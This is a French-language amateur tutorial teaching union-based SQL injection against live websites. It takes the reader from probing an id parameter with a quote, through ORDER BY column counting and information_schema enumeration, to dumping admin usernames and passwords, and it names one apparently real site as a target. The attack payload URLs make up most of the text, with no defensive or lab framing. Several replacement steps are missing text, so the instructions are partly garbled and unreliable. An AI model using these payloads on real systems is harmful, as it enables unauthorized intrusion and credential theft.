**************************
* TUTO SQLi Basic By Hypnoze57 *
**************************
Bonjour, j'ai décidé de faire mon propre tutoriel sur l'injection sqli basic.
Etape 1 : Trouvé un site !
Le site :
http://www.......com/......php?id=1030
Pour savoir, ajouté un ' après le chiffre/nombres de l'id
http://www.......com/......php?id=1030'
-->
ERREUR (FAILLE)Etape 2 : Trouvé les columns !
Enlever le ' et ajouté
(20 est un exemple) si il y a une erreur, le column est plus petit, si la page charge normalement, vous devez trouvé le dernier chiffres qui charge la page normalement, j'explique mal je sais mais rien de mieux qu'un exemple :
http://www.......com/......php?id=1030 order by 14--
--> ERREUR !
http://www.......com/......php?id=1030 order by 13--
--> PAS D'ERREUR ! (Le bon collumn)
MAIS
http://www.......com/......php?id=1030 order by 10--
--PAS D'ERREUR MAIS PAS LE BON CAR LES AUTRES PLUS HAUT (11,12,13) charger aussi la page !
Etape 3 : Tout selectionné !
http://www.marmoon.com/pregames.php?id=-1030 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13--
N'oublié pas de rajouté le - après le .php?id=
Etape 4 : La version de la bdd !
Vous avez surement remarquer que lorsque vous séléctionné tout les columns un chiffre apparait sur la page (4 chez nous)?Pour trouvé la version de la base de donnée, vous devez remplacer ce fameux chiffre par
http://www.......com/......php?id=-1030 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13--
Whouou ! La version et 5.*** ont peux continué ! Si la version est inférieur a 5, suivé un autre tutoriel
Etape 5 : Trouvé les tables !
Les tables vont logger les users, password ou autres infos !
Pour les trouvés, remplacer
par
& ajouté entre les deux -- et le dernier column ceci :
+from+information_schema.tables where table_schema=database()
Ce qui va nous donné :
http://www.......com/......php?id=-1030 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13+from+information_schema.tables where table_schema=database()--
Et la les tables s'affiche comme par miracle ! Celle qui nous intéresse est bien sûre admin !
Etape 6 : Exploité les tables !
Exploité les tables va nous servir a avoir les columns et dans les columns, il y aura les informations recherché !
Pour ceci, je vous invite a vous rendre ici :
http://getyourwebsitehere.com/jswb/text_to_ascii.htmlCe site va convertir votre texte en ASCII.
Convertissé votre table, ex :
admin = admin = 97,100,109,105,110
Mais comment l'utilisé ! Tres simple :
remplacé
par
group_concat(column_name)
Et
information_schema.tables
par
information_schema.columns
Et enfin
where table_schema=database()--
Par
where table_name=char(97,100,109,105,110)
(remplacé 97,100,109,105,110 par votre table en ASCII)
Ce qui nous donne :
http://www.......com/......php?id=-1030 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13+from+information_schema.columns where table_name=char(97,100,109,105,110)
Etape 7 : Exploité les columns !
Pour exploité les columns que nous avons trouvé (id,admin,pass) chez nous, tres simple, c'est la dessus que s'acheve mon tutoriel
Remplacé
group_concat(column_name)
PAR
group_concat(admin,0x3a,pass)
(0x3a est la valeur ASCII pour séparer admin de pass et si vous voulé exploité id au lieu de admin, remplacé admin (ou pass)par id)
ET
+from+information_schema.columns where table_name=char(97,100,109,105,110)
PAR
Ce qui va nous donné :
http://www.......com/......php?id=-1030 union all select 1,2,3,group_concat(admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin
Et la miracle ! On as les pass et les users !
admin:asdfgh
L'user = admin
Le pass = asdfgh
(c) Hypnoze57 Tutoriel ! MERCI DE NE PAS LE COPIER !